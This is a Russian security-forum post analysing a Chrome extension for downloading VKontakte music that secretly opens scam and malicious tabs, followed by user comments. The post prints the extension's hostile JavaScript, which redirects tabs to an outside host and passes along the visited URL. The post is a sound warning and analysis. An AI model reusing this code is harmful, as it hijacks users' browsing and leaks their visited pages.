Information Security Club | Клуб Информационной Безопасности — Stay Safe!
Добро пожаловать в Клуб Информационной Безопасности! Если Вы здесь впервые, то зарегистрируйтесь и прочитайте правила клуба. Если Вы забыли пароль, то перейдите по ссылке, после чего Вы сможете восстановить его через электронную почту. Помните, что некоторые возможности и разделы форума для гостей недоступны, рекомендуется пройти авторизацию.

Welcome to Information Security Club! You can change the website language to English here. If you are here for the first time, please, register and read forum rules. If you forgot your password follow this link to restore it by email. Remember, some facilities and forum nodes for guests are not available, it's highly recommended to pass authorization.

Почему расширения для браузера из магазина Google опасны? Скачай музыку из Вконтакте и пожалей! Внимание Почему расширения для браузера из магазина Google опасны? Скачай музыку из Вконтакте и пожалей!

5.00 star(s) 1 Vote
Привет читателям!

Поговорим сегодня о неприятных последствиях, которые могут вас подстерегать, даже если вы просто ищете возможность скачать любимую музыку из популярной социальной сети. Рассмотренная проблема на самом деле имеет более широкую огласку, поскольку описанный здесь показательный пример является лишь ещё одним свидетельством того, что до сих пор достаточно легко повстречать весьма опасные приложения или дополнения на вполне легальных официальных источниках, будь то Интернет-магазин расширений Google Chrome, магазин приложений для Android Google Play, Microsoft Store или какой-либо другой заведомо безопасный источник под известным именем.

Как я попал в переплет

В центре внимания моя личная и вполне типичная ситуация из жизни, в которую может попасть абсолютно любой человек. Используя популярную социальную сеть "Вконтакте" не только на своем смартфоне, но и на персональном компьютере для прослушивания аудиозаписей, мне потребовалось найти какое-либо средство для скачивания музыки из соцсети именно на компьютер (откуда потом, например, можно скопировать загруженное аудио на SD-карту или флешку для проигрывания в автомобиле). Особенно хотелось, чтобы любую интересующую аудиодорожку я мог загрузить отдельно.

Искать для решения такой, казалось бы, простой задачи целую отдельную и независимую программу я не счел нужным, да и риск повстречать в сети что-нибудь нежелательное или вредоносное по такому популярному поисковому запросу достаточно велик. Так как моим основным браузером является Google Chrome (в данном случае, подошел бы любой браузер на движке Chromium, будь то Opera, Vivaldi, Comodo Dragon и др.), мне доступен расширений Google Chrome с множеством бесплатных надстроек для самых разных схожих потребностей. Ещё один немало важный момент в пользу именно браузерного дополнения, а не отдельной программы — запущенная внутри браузера на движке Chromium среда изолирована от самой операционной системы (браузер играет роль своеобразной виртуальной машины) позволяет в случае чего избежать большинства опасных последствий после установки таких расширений (прошли те времена, когда вирусы проникали из плагинов браузера внутрь системы). Отсюда, выбор пал не на отдельное приложение для решения такой простой задачи, а на расширение для моего браузера Google Chrome, которое я стал искать на вполне официальном источнике.

Посетив главную страницу интернет-магазина расширений, я ввел в строку поиска "скачать музыку вконтакте", в результате чего предстал довольно скромный выбор:


3562
Если отталкиваться от тех дополнений для браузеров Chromium в официальном магазине, которые соответствуют моему поисковому запросу, то первое расширение в списке под названием "Скачать музыку" и есть то, что я искал. По крайней мере, в списке оно числится первым (предположительно, в виду самой высокой популярности). Все остальное по списку либо не подходило мне, либо обладало более широким, если не сказать, что громоздким, не нужным мне функционалом. Да и вообще, на самом деле качественных программ и дополнений на схожую тематику очень мало — альтернатива в виде SaveFrom Social или скрипта для менеджера Tampermonkey либо не совсем корректно работает, либо требует больше времени и сил на установку, а устанавливать широкопрофильную программу по типу Download Master не кажется слишком рациональным.

Вот так выглядит сама страница выбранного мною расширения в Интернете-магазине Google, которое я впоследствии установил себе в Google Chrome:


3563

Более половины отзывов положительные (четыре звезды из пяти возможных) — со слов установивших расширение, его функционал их вполне устраивает. Что касается остальной половины оценок с сугубо нелестной критикой, то можно наблюдать, как сам разработчик расширения в некоторых случаях любезно выходит на контакт и показывает свою заинтересованность в решении обозначенной проблемы:


3564

Как выяснилось позднее, к моему большому сожалению, я не нашел ни в одном отзыве какой-либо информации о истинной темной стороне этого расширения, узнав о котором его вообще вряд ли бы кто установил — среди негативного только указания на какие-то ошибки в работе и проблемы с совместимостью, что, конечно же, подлежит исправлению и далеко не так критично. Это очень печально, и наводит на разные мысли, вплоть до того, что эти сведения преднамеренно скрываются и соответствующие отзывы удаляются. Но ничего, ниже я расскажу как раз о том, почему действительно стоит избегать этого дополнения, как и большинства таких надстроек для браузеров от неизвестных авторов.

При установке дополнение "Скачать музыку" запрашивает следующие права доступа (разрешения):


3565

В самом начале это мало о чем говорит, но если обратить внимание на последнее в списке полномочие "Управление приложениями, расширениями и темами", то у особо внимательных начнут возникать сомнения. Задумайтесь, для чего такому простому загрузчику аудиоконтента из одной единственной соцсети нужны такие широкие полномочия? Лично я изначально не заострил на этом внимание и нажал на "Установить расширение", после чего начал на первый взгляд благополучно его использовать.

После установки в списке расширений настроек браузера Google Chrome ("Настройка и управление Google Chrome" -> "Дополнительные инструменты" -> "Расширения" -> нажать кнопку "Подробнее" под интересующим дополнением) доступна более подробная информация об этом плагине:


3561
Размер составляет менее одного мегабайта, периодически выпускаются новые версии для обеспечения постоянной совместимости с соцсетью (интеграция через API). Интерфейс реализован очень просто и примитивно — возле аудиозаписи на странице "Вконтакте" добавляется кнопка в форме стрелочки вниз, по нажатию на которую и происходит загрузка выбранной музыкальной композиции. Казалось бы, я нашел, что хотел и успешно начал этим пользоваться, разве не чудно?

Почему расширения для браузеров из любых источников могут быть опасны?

Первое время музыка скачивалась без проблем и последствий, а расширение все это время оставалось включенным (почему-то в этот раз я не повел себя по своей старой привычке отключать неиспользуемые в данный момент плагины для браузера). Вероятно, с какого-то момента далее (не исключаю, что после автоматического обновления этого расширения до более новой версии) начали происходить любопытные вещи. Всё началось с того, что, находясь на собственном доверенном веб-сайте, у меня внезапно и самопроизвольно открылась новая вкладка со следующим содержимым:


3558

Узнаете? Всем уже проевший плешь своей глупой рекламой везде где только можно псевдобукмекер 1XBET! Я сейчас не стану вам рассказывать, почему это сугубо мошенническая организация, охотно отмывающая денежки у любителей сделать ставочку на кругленькую сумму с заманчиво низким коэффициентом (ещё до меня об этом хорошо рассказали ). URL-адрес самого веб-ресурса тоже очень странный и не похож на обычный открытый сайт:


3555
При всем желании, даже специально, вбив хотя бы даже домен этого URL-адреса вручную в адресную строку браузера, попасть на эту страницу просто так не получится. и сигнатура на этот адрес у абсолютно всех антивирусных вендоров. Любопытно.

Как человека, работающего в области информационной безопасности, меня интересовала причина такого неконтролируемого процесса открытия вкладок с мошенническими и сомнительными сайтами. Благо, в последнее время я не увлекался установкой каких-либо приложений на свой компьютер и был уверен в его чистоте по части вирусного заражения. Зато я тут же вспомнил, что чуть более недели назад установил создавшее для меня в первое время хорошее впечатление то самой расширение для Google Chrome под названием "Скачать музыку".

Далее, не составило никакого труда снова зайти в настройки браузера и выключить его. Шоу с изредка открывающимися страницами тут же закончилось. А, как только я снова включил этот плагин, продолжилось. Но теперь уже открылся не менее интересный и подозрительный источник, прямо в тот момент, когда я находился во вкладке с открытой безопасной страницей поисковой системы Google (с него меня переместило на новую активную вкладку). Вот что я увидел:


3557
Здесь уже не просто какой-то мошеннический сайтик воров-букмекеров, а вполне себе классический вредоносный веб-ресурс, где настойчиво предлагается разрешить установку ещё какого-то расширения для браузера. Ясное дело, ни при каких обстоятельствах не стоит давать согласие на установку (даже если это уведомление поддельное, как в случае с этим сайтом) — что говорить про сторонние заведомо небезопасные источники установки, если мне такая гадость даже с официального магазина расширений Google попалась.

URL-адрес, как вы могли заметить, также был сфабрикован:


3556

и не открывается при его ручном вводе в адресную строку браузера. Какие-либо записи об этом домене в базах сигнатур схожим образом во всех антивирусных программах.

Думаю, теперь не сложно понять, что это гадкое дополнение подставляет в адресную строку браузера сфабрикованные URL-адреса, которых попросту не существует. Возможно, это делается для того, что скрыть истинный адрес открытой веб-страницы, чтобы запутать пользователя или антивирусную программу, заодно покрыв друзей-мошенников. Правильно, вспомните, сколько оно запросило прав во время установки? Теперь понятно, зачем они на самом деле были ему нужны.

Стоит ли осуждать автора этого дополнения и тех, кто должен следить за публикуемым контентом в магазине расширений Google? Я считаю, что очень даже стоит! Компания Google уже какой год не может навести порядок на своих веб-ресурсах, куда публикуют свои разработки разные люди (вспомните тот же Google Play Маркет с вирусами для Android). Что касается самого автора, то даже если это такой способ получить хоть какие-то денежки за свои труды, это совершенно никак не объясняет тот факт, что ни в отзывах, ни в описании этого дополнения на странице в магазине нет информации о том, что оно требует больше положенного прав доступа и открывает само по себе вкладки с мошенническими и вредоносными веб-сайтами, ещё и скрывая их подлинный URL-адрес. Такая деятельность позволяет причислить его самого к вирусописателям и мошенникам.

После увиденного не должно возникнуть вопросов о том, почему расширения для браузеров, откуда бы вы их не скачали, могут нести опасность. Напомню, что наш веб-ресурс ProvisionSecurity.Club ранее уже публиковал не менее любопытный материал про потенциально нежелательное ПО и другое опасное расширение для браузера.

Разбор полетов

Для тех, кто требует доказательства вышесказанному или же интересуется подробностями, я продемонстрирую краткие результаты анализа этого расширения.

После того, как вы подтверждаете установку расширения из магазина в Google Chrome нажатием кнопки "Установить расширение", в скрытый каталог браузера Google Chrome по пути "AppData\Local\Google\Chrome" на ваш компьютер из сети загружаются новые файлы (получить туда доступ можно только включив доступ скрытых файлов и папок в проводнике Windows):


3566

Выделенное красным цветом на скриншоте выше и есть те файлы, которые относятся к этому злополучному расширению. В красном прямоугольнике можно наблюдать идентификатор самого дополнения, который присвоен ему ещё в интернет-магазине Google и далее сохраняется в браузере Google Chrome.

Основное содержимое плагина расположено в папке "Extensions" и имеет следующую структуру (она включает в себя весь основой код расширения, а также все требуемые директории и компоненты для работы в браузере):


3572
Не давал покоя вопрос, где именно, в каком фрагменте кода кроется причина самопроизвольного открытия вкладок, ведь большая часть файлов расширения не вызывает подозрений и лишь реализует основной функционал для скачивания музыки из социальной сети "Вконтакте" (также для этого задействует открытый код скриптов других авторов).

Как выяснилось, разгадка находилась в подкаталоге по пути "lib\chrome", где находился js-скрипт с наименованием "chrome":


3569
На момент написания статьи ни один антивирус вновь в своих базах сигнатуру на этот скрипт.

В коде скрипта "chrome.js" находится как раз реализация незаявленного функционала по самовольному открытию вкладок с нежелательными веб-ресурсами. На это указывает один из фрагментов кода на языке JavaScript:


3567

В красные рамки обведены участки кода с объявлением переменных и функций по созданию новых вкладок в Google Chrome, генерации URL-адресов в этих вкладках и интервалах времени между самопроизвольным открытием этих вкладок самим расширением.


JavaScript:
chrome.webRequest.onBeforeRequest.addListener(e = function(e) {
    if (!0 === a) {
        t = new Date().getTime();
        var i = new URL(e.url).hostname.split(".").reverse()[1], s = h(i, o);
        -1 === i.indexOf("expres") && -1 === i.indexOf("rbest") || !1 !== s && "goodtime" !== s || (chrome.tabs.query({
            currentWindow: !0,
            active: !0
        }, function(t) {
            chrome.tabs.update(t[0].id, {
                url: "https://" + n + "/rd?rf=" + e.url
            });
        }), r = new Date().getTime(), !1 === s && o.push([ i, r ]));
    }
}, {
    urls: [ "*://*/*" ],
    types: [ "main_frame" ]
}, [ "blocking" ]), chrome.tabs.onCreated.addListener(function(e) {
    chrome.storage.local.get("installDay", function(t) {
        var r = t.installDay;
        void 0 === r && (r = new Date().getTime(), chrome.storage.local.set({
            installDay: r
        }));
        var a = new Date().getTime();
        a - r > 2592e5 && chrome.storage.local.get("shownShare", function(t) {
            var r = t.shownShare;
            void 0 !== r && 0 !== r || c(e), chrome.storage.local.get("lastShare", function(t) {
                var r = t.lastShare;
                a - r > 18e6 && c(e);
            });
        });
    });
});
Косвенно на такую вредоносную деятельность указывают и некоторые обозначения в коде этого же файла, например:


3568
Обведенное в красную рамку на скриншоте выше название переменной "app.popup" (она присвоена объявлению новой функции), сразу наводит на мысль о таком понятии, как "Pop-up", что означает браузерную рекламу как раз в форме самопроизвольно открывающихся вкладок, всплывающих окон и другое. Саму же кустарную деятельность, реализованную в этом расширении, в чистом виде рекламой назвать затруднительно, поскольку она больше походит на пропаганду мошеннических и вредоносных веб-ресурсов.


JavaScript:
app.popup = (function () {
  var _tmp = {};
  chrome.runtime.onMessage.addListener(function (request, sender, sendResponse) {
    for (var id in _tmp) {
      if (_tmp[id] && (typeof _tmp[id] === "function")) {
        if (request.path === 'popup-to-background') {
          if (request.method === id) _tmp[id](request.data);
        }
      }
    }
  });
  /*  */
  return {
    "receive": function (id, callback) {_tmp[id] = callback},
    "send": function (id, data, tabId) {
      chrome.runtime.sendMessage({"path": 'background-to-popup', "method": id, "data": data});
    }
  }
})();
На основании чего, наиболее правильное решение — воздержаться от установки расширения по причине его причастности к мошеннической и вредоносной деятельности. Ещё лучше, если бы файлы этого расширение и те поддельные URL-адреса, которые оно подставляет в адресную строку браузера, попали в базы сигнатур большинства антивирусов, а само дополнение было бы удалено из Интернет-магазина расширений Google.

Как удалить опасное расширение из браузера?

К счастью, если вы, как и я, все же установили это расширение в свой браузер, удалить его не сложно. Для этого снова перейдите в список установленных расширений вашего браузера (для Google Chrome перейдите по пути: "Настройка и управление Google Chrome" -> "Дополнительные инструменты" -> "Расширения"):


3570


и нажмите кнопку "Удалить" под расширением "Скачать музыку":


3571
Подтвердите удаление и перезапустите браузер. Поздравляю, вы успешно избавились от проблем с самопроизвольным открытием вкладок в браузере.

Резюме

Описанная в статье история приводит массу доводов не повторять мой печальный опыт, и с очень большой осторожностью устанавливать расширения для ваших браузеров только с официальных источников (внимательно смотрите на список запрашиваемых разрешений), что само по себе отнюдь не является гарантией безопасности. Не забывайте, что далеко не всегда можно обратить все последствия вспять: некоторые опасные расширения для браузеров в процессе своей деятельности ещё и активно мусорят в системе, оставляя следы глубоко в реестре, что не позволит полностью провести очистку и избавиться от замусоревания дискового пространства вашего компьютера, а некоторые браузерные плагины и вовсе могут осуществлять шпионскую деятельность.

С другой стороны, если вы заметили что-то неладное в браузере, будь то открывающиеся без вашего ведома окна, вкладки, измененная домашняя страница — стоит сначала поискать причину в списке установленных расширений вашего браузера и удалить оттуда все лишнее, а потом уже искать во всей системе какие-то отдельные вредоносные программы. Что касается антивирусных программ, то, как вы заметили выше, в некоторых случаях (как в этом) они вообще бессильны, и далеко не каждый антивирус нацелен на обнаружение опасных плагинов для браузеров (нередко для этого нужно отдельно вручную включать обнаружение нежелательных и рекламных программ).

Учитесь на чужих ошибках, а не на своих.:)

x-sis, при копировании материалов статьи ссылка на форум https://ProvisionSecurity.Club обязательна.
 
Потерялась совместимость с Хромом. Потому есть рекомендации от разработчиков для пользователей Хрома
Обратная совместимость. Понятно. Но здесь опять же больше действий и через посредника (как с Tampermonkey ситуация). В статье же рассматривался самый удобный и простой вариант: нашел и сразу установил. И действительно практика показала, что такой вариант не самый лучший.
 
В Опере всегда их расширение у меня работало и работает в новейшей Опере отлично. Хром не использую, потому не знаю ситуацию.
Они отдельно пишут под Оперу и под Хром? Некоторые просто пишут под один хромообраз, а в остальных работает через расширение-эмулятор дополнений другого браузера.
 
В статье же рассматривался самый удобный и простой вариант: нашел и сразу установил.
В случае с Оперой или Яндекс Браузером так и есть. В ЯБ даже искать не надо: он сам это расширение предлагает. И только в случае с Хромом нужно предварительно установить Chameleon (а не Tampermonkey), чтобы обеспечить возможность установки расширений Оперы, после чего установить расширение для Оперы.
 
Некоторые просто пишут под один хромообраз,
Это расширение всегда под Оперу писалось. И под ЯБ по факту тоже, ибо он на основе Оперы. При этом Опера обладает гораздо большей совместимостью по сравнению с Хромом: это тоже традиционно.
 
Это расширение всегда под Оперу писалось. И под ЯБ по факту тоже, ибо он на основе Оперы. При этом Опера обладает гораздо большей совместимостью по сравнению с Хромом: это тоже традиционно.
Вопиющая ситуация. Передовой по выходу версий браузер авторов движка отстает от конкурентов по части расширений, еще и гадости полный магазин.
 
Прошли те года когда можно было использовать "Vk downloader" (точно не помню название, но было такое расширение). Сейчас еще есть "VK DJ", но это отдельная программа. Сам же скачиваю с zaycev.net, yandex music. А инструменты разные - скриптом с yandex music, savefrom или inmood c других сайтов. Адаптируюсь как могу))
 
Прошли те года когда можно было использовать "Vk downloader" (точно не помню название, но было такое расширение).
Точно, сам захватил немного того времени. Простое и быстрое решение было, которое как раз натолкнуло меня на поиски чего-то такого в современности. Но, увы, нашел лишь обратное.

Сам же скачиваю с zaycev.net
Оттуда опасно скачивать, чуть ли не в саму музыку рекламу начнут скоро пихать.:) Хотя вк в этом плане не лучше.
 
zaycev.net
Там меньше вирусов, чем в том же mp3party. Как то там наткнулся на "авторизацию", где потребовали номер телефона. В зайцев море рекламы, но на том спасибо, что мне не надо платить :) А с пати скачиваю музыку только на PSP (:facepalm:)
 

Top Bottom